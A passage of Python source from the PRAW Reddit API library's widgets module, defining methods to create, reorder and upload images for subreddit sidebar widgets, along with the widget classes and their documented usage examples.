Each button is either a text button or an image button. A text
button looks like this:
.. code-block:: none
{
"kind": "text",
"text": a string no longer than 30 characters,
"url": a valid URL,
"color": a 6-digit rgb hex color, e.g. `#AABBCC`,
"textColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"fillColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"hoverState": {...}
}
An image button looks like this:
.. code-block:: none
{
"kind": "image",
"text": a string no longer than 30 characters,
"linkUrl": a valid URL,
"url": a valid URL of a reddit-hosted image,
"height": an integer,
"width": an integer,
"hoverState": {...}
}
Both types of buttons have the field ``hoverState``. The field does
not have to be included (it is optional). If it is included, it can
be one of two types: text or image. A text ``hoverState`` looks
like this:
.. code-block:: none
{
"kind": "text",
"text": a string no longer than 30 characters,
"color": a 6-digit rgb hex color, e.g. `#AABBCC`,
"textColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"fillColor": a 6-digit rgb hex color, e.g. `#AABBCC`
}
An image ``hoverState`` looks like this:
.. code-block:: none
{
"kind": "image",
"url": a valid URL of a reddit-hosted image,
"height": an integer,
"width": an integer
}
.. note::
The method :meth:`.upload_image` can be used to upload images to
Reddit for a ``url`` field that holds a Reddit-hosted image.
.. note::
An image ``hoverState`` may be paired with a text widget, and a
text ``hoverState`` may be paired with an image widget.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
my_image = widget_moderation.upload_image('/path/to/pic.jpg')
buttons = [
{
'kind': 'text',
'text': 'View source',
'url': 'https://github.com/praw-dev/praw',
'color': '#FF0000',
'textColor': '#00FF00',
'fillColor': '#0000FF',
'hoverState': {
'kind': 'text',
'text': 'ecruos weiV',
'color': '#FFFFFF',
'textColor': '#000000',
'fillColor': '#0000FF'
}
},
{
'kind': 'image',
'text': 'View documentation',
'linkUrl': 'https://praw.readthedocs.io',
'url': my_image,
'height': 200,
'width': 200,
'hoverState': {
'kind': 'image',
'url': my_image,
'height': 200,
'width': 200
}
}
]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_button_widget(
'Things to click', 'Click some of these *cool* links!',
buttons, styles)
"""
button_widget = {
"buttons": buttons,
"description": description,
"kind": "button",
"shortName": short_name,
"styles": styles,
}
button_widget.update(other_settings)
return self._create_widget(button_widget)
def add_calendar(
self,
short_name,
google_calendar_id,
requires_sync,
configuration,
styles,
**other_settings
):
"""Add and return a :class:`.Calendar` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param google_calendar_id: An email-style calendar ID. To share a
Google Calendar, make it public,
then find the "Calendar ID."
:param requires_sync: A ``bool``.
:param configuration: A ``dict`` as specified in `Reddit docs`_.
Example:
.. code-block:: python
{'numEvents': 10,
'showDate': True,
'showDescription': False,
'showLocation': False,
'showTime': True,
'showTitle': True}
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
config = {'numEvents': 10,
'showDate': True,
'showDescription': False,
'showLocation': False,
'showTime': True,
'showTitle': True}
cal_id = '[email protected]'
new_widget = widget_moderation.add_calendar('Upcoming Events',
cal_id, True,
config, styles)
"""
calendar = {
"shortName": short_name,
"googleCalendarId": google_calendar_id,
"requiresSync": requires_sync,
"configuration": configuration,
"styles": styles,
"kind": "calendar",
}
calendar.update(other_settings)
return self._create_widget(calendar)
def add_community_list(self, short_name, data, styles, **other_settings):
"""Add and return a :class:`.CommunityList` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param data: A ``list`` of subreddits. Subreddits can be represented as
``str`` (e.g. the string ``'redditdev'``) or as
:class:`.Subreddit` (e.g.
``reddit.subreddit('redditdev')``). These types may be
mixed within the list.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
subreddits = ['learnpython', reddit.subreddit('redditdev')]
new_widget = widget_moderation.add_community_list('My fav subs',
subreddits,
styles)
"""
community_list = {
"data": [str(datum) for datum in data],
"kind": "community-list",
"shortName": short_name,
"styles": styles,
}
community_list.update(other_settings)
return self._create_widget(community_list)
def add_custom_widget(
self,
short_name,
text,
css,
height,
image_data,
styles,
**other_settings
):
r"""Add and return a :class:`.CustomWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param text: The Markdown text displayed in the widget.
:param css: The CSS for the widget, no longer than 100000 characters.
.. note::
As of this writing, Reddit will not accept empty CSS. If you
wish to create a custom widget without CSS, consider using
``'/**/'`` (an empty comment) as your CSS.
:param height: The height of the widget, between 50 and 500.
:param image_data: A ``list`` of ``dict``\ s as specified in
`Reddit docs`_. Each ``dict`` represents an image and has the
key ``'url'`` which maps to the URL of an image hosted on
Reddit's servers. Images should be uploaded using
:meth:`.upload_image`.
Example:
.. code-block:: python
[{'url': 'https://some.link', # from upload_image()
'width': 600, 'height': 450,
'name': 'logo'},
{'url': 'https://other.link', # from upload_image()
'width': 450, 'height': 600,
'name': 'icon'}]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
image_urls = [widget_moderation.upload_image(img_path)
for img_path in image_paths]
image_dicts = [{'width': 600, 'height': 450, 'name': 'logo',
'url': image_urls[0]},
{'width': 450, 'height': 600, 'name': 'icon',
'url': image_urls[1]}]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_custom_widget('My widget',
'# Hello world!',
'/**/', 200,
image_dicts, styles)
"""
custom_widget = {
"css": css,
"height": height,
"imageData": image_data,
"kind": "custom",
"shortName": short_name,
"styles": styles,
"text": text,
}
custom_widget.update(other_settings)
return self._create_widget(custom_widget)
def add_image_widget(self, short_name, data, styles, **other_settings):
r"""Add and return an :class:`.ImageWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param data: A ``list`` of ``dict``\ s as specified in `Reddit docs`_.
Each ``dict`` has the key ``'url'`` which maps to the URL
of an image hosted on Reddit's servers. Images should
be uploaded using :meth:`.upload_image`.
Example:
.. code-block:: python
[{'url': 'https://some.link', # from upload_image()
'width': 600, 'height': 450,
'linkUrl': 'https://github.com/praw-dev/praw'},
{'url': 'https://other.link', # from upload_image()
'width': 450, 'height': 600,
'linkUrl': 'https://praw.readthedocs.io'}]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
image_dicts = [{'width': 600, 'height': 450, 'linkUrl': '',
'url': widget_moderation.upload_image(img_path)}
for img_path in image_paths]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_image_widget('My cool pictures',
image_dicts, styles)
"""
image_widget = {
"data": data,
"kind": "image",
"shortName": short_name,
"styles": styles,
}
image_widget.update(other_settings)
return self._create_widget(image_widget)
def add_menu(self, data, **other_settings):
r"""Add and return a :class:`.Menu` widget.
:param data: A ``list`` of ``dict``\ s describing menu contents, as
specified in `Reddit docs`_. As of this writing, the format is:
.. code-block:: none
[
{
"text": a string no longer than 20 characters,
"url": a valid URL
},
OR
{
"children": [
{
"text": a string no longer than 20 characters,
"url": a valid URL,
},
...
],
"text": a string no longer than 20 characters,
},
...
]
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
menu_contents = [
{'text': 'My homepage', 'url': 'https://example.com'},
{'text': 'Python packages',
'children': [
{'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},
{'text': 'requests', 'url': 'http://python-requests.org'}
]},
{'text': 'Reddit homepage', 'url': 'https://reddit.com'}
]
new_widget = widget_moderation.add_menu(menu_contents)
"""
menu = {"data": data, "kind": "menu"}
menu.update(other_settings)
return self._create_widget(menu)
def add_post_flair_widget(
self, short_name, display, order, styles, **other_settings
):
"""Add and return a :class:`.PostFlairWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param display: Display style. Either ``'cloud'`` or ``'list'``.
:param order: A ``list`` of flair template IDs. You can get all flair
template IDs in a subreddit with:
.. code-block:: python
flairs = [f['id'] for f in subreddit.flair.link_templates]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
subreddit = reddit.subreddit('mysub')
widget_moderation = subreddit.widgets.mod
flairs = [f['id'] for f in subreddit.flair.link_templates]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_post_flair_widget('Some flairs',
'list',
flairs, styles)
"""
post_flair = {
"kind": "post-flair",
"display": display,
"shortName": short_name,
"order": order,
"styles": styles,
}
post_flair.update(other_settings)
return self._create_widget(post_flair)
def add_text_area(self, short_name, text, styles, **other_settings):
"""Add and return a :class:`.TextArea` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param text: The Markdown text displayed in the widget.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_text_area('My cool title',
'*Hello* **world**!',
styles)
"""
text_area = {
"shortName": short_name,
"text": text,
"styles": styles,
"kind": "textarea",
}
text_area.update(other_settings)
return self._create_widget(text_area)
def reorder(self, new_order, section="sidebar"):
"""Reorder the widgets.
:param new_order: A list of widgets. Represented as a ``list`` that
contains ``Widget`` objects, or widget IDs as strings. These types
may be mixed.
:param section: The section to reorder. (default: ``'sidebar'``)
Example usage:
.. code-block:: python
widgets = reddit.subreddit('mysub').widgets
order = list(widgets.sidebar)
order.reverse()
widgets.mod.reorder(order)
"""
order = [
thing.id if isinstance(thing, Widget) else str(thing)
for thing in new_order
]
path = API_PATH["widget_order"].format(
subreddit=self._subreddit, section=section
)
self._reddit.patch(
path, data={"json": dumps(order), "section": section}
)
def upload_image(self, file_path):
"""Upload an image to Reddit and get the URL.
:param file_path: The path to the local file.
:returns: The URL of the uploaded image as a ``str``.
This method is used to upload images for widgets. For example,
it can be used in conjunction with :meth:`.add_image_widget`,
:meth:`.add_custom_widget`, and :meth:`.add_button_widget`.
Example usage:
.. code-block:: python
my_sub = reddit.subreddit('my_sub')
image_url = my_sub.widgets.mod.upload_image('/path/to/image.jpg')
images = [{'width': 300, 'height': 300,
'url': image_url, 'linkUrl': ''}]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
my_sub.widgets.mod.add_image_widget('My cool pictures', images,
styles)
"""
img_data = {
"filepath": os.path.basename(file_path),
"mimetype": "image/jpeg",
}
if file_path.lower().endswith(".png"):
img_data["mimetype"] = "image/png"
url = API_PATH["widget_lease"].format(subreddit=self._subreddit)
# until we learn otherwise, assume this request always succeeds
upload_lease = self._reddit.post(url, data=img_data)["s3UploadLease"]
upload_data = {
item["name"]: item["value"] for item in upload_lease["fields"]
}
upload_url = "https:{}".format(upload_lease["action"])
with open(file_path, "rb") as image:
response = self._reddit._core._requestor._http.post(
upload_url, data=upload_data, files={"file": image}
)
response.raise_for_status()
return upload_url + "/" + upload_data["key"]
class Widget(PRAWBase):
"""Base class to represent a Widget."""
@property
def mod(self):
"""Get an instance of :class:`.WidgetModeration` for this widget.
.. note::
Using any of the methods of :class:`.WidgetModeration` will likely
make outdated the data in the :class:`.SubredditWidgets` that this
widget belongs to. To remedy this, call
:meth:`~.SubredditWidgets.refresh`.
"""
if self._mod is None:
self._mod = WidgetModeration(self, self.subreddit, self._reddit)
return self._mod
def __eq__(self, other):
"""Check equality against another object."""
if isinstance(other, Widget):
return self.id.lower() == other.id.lower()
return str(other).lower() == self.id.lower()
# pylint: disable=invalid-name
def __init__(self, reddit, _data):
"""Initialize an instance of the class."""
self.subreddit = "" # in case it isn't in _data
self.id = "" # in case it isn't in _data
super(Widget, self).__init__(reddit, _data=_data)
self._mod = None
class ButtonWidget(Widget, BaseList):
r"""Class to represent a widget containing one or more buttons.
Find an existing one:
.. code-block:: python
button_widget = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.ButtonWidget):
button_widget = widget
break
for button in button_widget:
print(button.text, button.url)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
buttons = [
{
'kind': 'text',
'text': 'View source',
'url': 'https://github.com/praw-dev/praw',
'color': '#FF0000',
'textColor': '#00FF00',
'fillColor': '#0000FF',
'hoverState': {
'kind': 'text',
'text': 'ecruos weiV',
'color': '#000000',
'textColor': '#FFFFFF',
'fillColor': '#0000FF'
}
},
{
'kind': 'text',
'text': 'View documentation',
'url': 'https://praw.readthedocs.io',
'color': '#FFFFFF',
'textColor': '#FFFF00',
'fillColor': '#0000FF'
},
]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
button_widget = widgets.mod.add_button_widget(
'Things to click', 'Click some of these *cool* links!',
buttons, styles)
For more information on creation, see :meth:`.add_button_widget`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
button_widget = button_widget.mod.update(shortName='My fav buttons',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
button_widget.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``buttons`` A ``list`` of :class:`.Button`\ s. These can also
be accessed just by iterating over the
:class:`.ButtonWidget` (e.g. ``for button in
button_widget``).
``description`` The description, in Markdown.
``description_html`` The description, in HTML.
``id`` The widget ID.
``kind`` The widget kind (always ``'button'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "buttons"
class Calendar(Widget):
r"""Class to represent a calendar widget.
Find an existing one:
.. code-block:: python
calendar = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.Calendar):
calendar = widget
break
print(calendar.googleCalendarId)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
config = {'numEvents': 10,
'showDate': True,
'showDescription': False,
'showLocation': False,
'showTime': True,
'showTitle': True}
cal_id = '[email protected]'
calendar = widgets.mod.add_calendar(
'Upcoming Events', cal_id, True, config, styles)
For more information on creation, see :meth:`.add_calendar`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
calendar = calendar.mod.update(shortName='My fav events',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
calendar.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``configuration`` A ``dict`` describing the calendar configuration.
``data`` A ``list`` of ``dict``\ s that represent events.
``id`` The widget ID.
``kind`` The widget kind (always ``'calendar'``).
``requiresSync`` A ``bool``.
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
======================= ===================================================
"""
class CommunityList(Widget, BaseList):
r"""Class to represent a Related Communities widget.
Find an existing one:
.. code-block:: python
community_list = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.CommunityList):
community_list = widget
break
print(community_list)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
subreddits = ['learnpython', reddit.subreddit('announcements')]
community_list = widgets.mod.add_community_list('Related subreddits',
subreddits, styles)
For more information on creation, see :meth:`.add_community_list`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
community_list = community_list.mod.update(shortName='My fav subs',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
community_list.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``data`` A ``list`` of :class:`.Subreddit`\ s. These can
also be iterated over by iterating over the
:class:`.CommunityList` (e.g. ``for sub in
community_list``).
``id`` The widget ID.
``kind`` The widget kind (always ``'community-list'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "data"
class CustomWidget(Widget):
"""Class to represent a custom widget.
Find an existing one:
.. code-block:: python
custom = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.CustomWidget):
custom = widget
break
print(custom.text)
print(custom.css)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
custom = widgets.mod.add_custom_widget(
'My custom widget', '# Hello world!', '/**/', 200, [], styles)
For more information on creation, see :meth:`.add_custom_widget`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
custom = custom.mod.update(shortName='My fav customization',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
custom.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``css`` The CSS of the widget, as a ``str``.
``height`` The height of the widget, as an ``int``.
``id`` The widget ID.
``imageData`` A ``list`` of :class:`.ImageData` that belong to
the widget.
``kind`` The widget kind (always ``'custom'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``stylesheetUrl`` A link to the widget's stylesheet.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
``text`` The text contents, as Markdown.
``textHtml`` The text contents, as HTML.
======================= ===================================================
"""
def __init__(self, reddit, _data):
"""Initialize the class."""
_data["imageData"] = [
ImageData(reddit, data) for data in _data.pop("imageData")
]
super(CustomWidget, self).__init__(reddit, _data=_data)
class IDCard(Widget):
"""Class to represent an ID card widget.
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
id_card = widgets.id_card
print(id_card.subscribersText)
Update one (requires proper moderator permissions):
.. code-block:: python
widgets.id_card.mod.update(currentlyViewingText='Bots')
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
=========================== ===============================================
Attribute Description
=========================== ===============================================
``currentlyViewingCount`` The number of Redditors viewing the subreddit.
``currentlyViewingText`` The text displayed next to the view count. For
example, "users online".
``description`` The subreddit description.
``id`` The widget ID.
``kind`` The widget kind (always ``'id-card'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'``
and ``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget
belongs to.
``subscribersCount`` The number of subscribers to the subreddit.
``subscribersText`` The text displayed next to the subscriber
count. For example, "users subscribed".
=========================== ===============================================
"""
class ImageWidget(Widget, BaseList):
r"""Class to represent an image widget.
Find an existing one:
.. code-block:: python
image_widget = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.ImageWidget):
image_widget = widget
break
for image in image_widget:
print(image.url)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
image_dicts = [{'width': 600, 'height': 450, 'linkUrl': '',
'url': widgets.mod.upload_image(img_path)}
for img_path in image_paths]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
image_widget = widgets.mod.add_image_widget('My cool pictures',
image_dicts, styles)
For more information on creation, see :meth:`.add_image_widget`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
image_widget = image_widget.mod.update(shortName='My fav images',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
image_widget.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``data`` A list of the :class:`.Image`\ s in this widget.
Can be iterated over by iterating over the
:class:`.ImageWidget` (e.g. ``for img in
image_widget``).
``id`` The widget ID.
``kind`` The widget kind (always ``'image'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "data"
class Menu(Widget, BaseList):
r"""Class to represent the top menu widget of a subreddit.
Menus can generally be found as the first item in a subreddit's top bar.
.. code-block:: python
topbar = reddit.subreddit('redditdev').widgets.topbar
if len(topbar) > 0:
probably_menu = topbar[0]
assert isinstance(probably_menu, praw.models.Menu)
for item in probably_menu:
if isinstance(item, praw.models.Submenu):
print(item.text)
for child in item:
print('\t', child.text, child.url)
else: # MenuLink
print(item.text, item.url)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
menu_contents = [
{'text': 'My homepage', 'url': 'https://example.com'},
{'text': 'Python packages',
'children': [
{'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},
{'text': 'requests', 'url': 'http://python-requests.org'}
]},
{'text': 'Reddit homepage', 'url': 'https://reddit.com'}
]
menu = widgets.mod.add_menu(menu_contents)
For more information on creation, see :meth:`.add_menu`.
Update one (requires proper moderator permissions):
.. code-block:: python
menu_items = list(menu)
menu_items.reverse()
menu = menu.mod.update(data=menu_items)
Delete one (requires proper moderator permissions):
.. code-block:: python
menu.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``data`` A list of the :class:`.MenuLink`\ s and
:class:`.Submenu`\ s in this widget.
Can be iterated over by iterating over the
:class:`.Menu` (e.g. ``for item in menu``).
``id`` The widget ID.
``kind`` The widget kind (always ``'menu'``).
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "data"
class ModeratorsWidget(Widget, BaseList):
r"""Class to represent a moderators widget.
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
print(widgets.moderators_widget)
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
widgets.moderators_widget.mod.update(styles=new_styles)
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``id`` The widget ID.
``kind`` The widget kind (always ``'moderators'``).
``mods`` A list of the :class:`.Redditor`\ s that moderate
the subreddit. Can be iterated over by iterating
over the :class:`.ModeratorsWidget` (e.g. ``for
mod in widgets.moderators_widget``).
``styles`` A ``dict`` with the keys ``'backgroundColor'``
and ``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget
belongs to.
``totalMods`` The total number of moderators in the subreddit.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "mods"
def __init__(self, reddit, _data):
"""Initialize the moderators widget."""
if self.CHILD_ATTRIBUTE not in _data:
# .mod.update() sometimes returns payload without 'mods' field
_data[self.CHILD_ATTRIBUTE] = []
super(ModeratorsWidget, self).__init__(reddit, _data=_data)
class PostFlairWidget(Widget, BaseList):
r"""Class to represent a post flair widget.
Find an existing one:
.. code-block:: python
post_flair_widget = None
widgets = reddit.subreddit('redditdev').widgets
for widget in widgets.sidebar:
if isinstance(widget, praw.models.PostFlairWidget):
post_flair_widget = widget
break
for flair in post_flair_widget:
print(flair)
print(post_flair_widget.templates[flair])
Create one (requires proper moderator permissions):
.. code-block:: python
subreddit = reddit.subreddit('redditdev')
widgets = subreddit.widgets
flairs = [f['id'] for f in subreddit.flair.link_templates]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
post_flair = widgets.mod.add_post_flair_widget('Some flairs', 'list',
flairs, styles)
For more information on creation, see :meth:`.add_post_flair_widget`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
post_flair = post_flair.mod.update(shortName='My fav flairs',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
post_flair.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``display`` The display style of the widget, either ``'cloud'``
or ``'list'``.
``id`` The widget ID.
``kind`` The widget kind (always ``'post-flair'``).
``order`` A list of the flair IDs in this widget.
Can be iterated over by iterating over the
:class:`.PostFlairWidget` (e.g. ``for flair_id in
post_flair``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
``templates`` A ``dict`` that maps flair IDs to ``dict``\ s that
describe flairs.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "order"
class RulesWidget(Widget, BaseList):
"""Class to represent a rules widget.
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
rules_widget = None
for widget in widgets.sidebar:
if isinstance(widget, praw.models.RulesWidget):
rules_widget = widget
break
from pprint import pprint; pprint(rules_widget.data)
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
rules_widget.mod.update(display='compact', shortName='The LAWS',
styles=new_styles)
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``data`` A list of the subreddit rules.
Can be iterated over by iterating over the
:class:`.RulesWidget` (e.g. ``for rule in
rules_widget``).
``display`` The display style of the widget, either ``'full'``
or ``'compact'``.
``id`` The widget ID.
``kind`` The widget kind (always ``'subreddit-rules'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'``
and ``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget
belongs to.
======================= ===================================================
"""
CHILD_ATTRIBUTE = "data"
def __init__(self, reddit, _data):
"""Initialize the rules widget."""
if self.CHILD_ATTRIBUTE not in _data:
# .mod.update() sometimes returns payload without 'data' field
_data[self.CHILD_ATTRIBUTE] = []
super(RulesWidget, self).__init__(reddit, _data=_data)
class TextArea(Widget):
"""Class to represent a text area widget.
Find a text area in a subreddit:
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
text_area = None
for widget in widgets.sidebar:
if isinstance(widget, praw.models.TextArea):
text_area = widget
break
print(text_area.text)
Create one (requires proper moderator permissions):
.. code-block:: python
widgets = reddit.subreddit('redditdev').widgets
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
text_area = widgets.mod.add_text_area('My cool title',
'*Hello* **world**!',
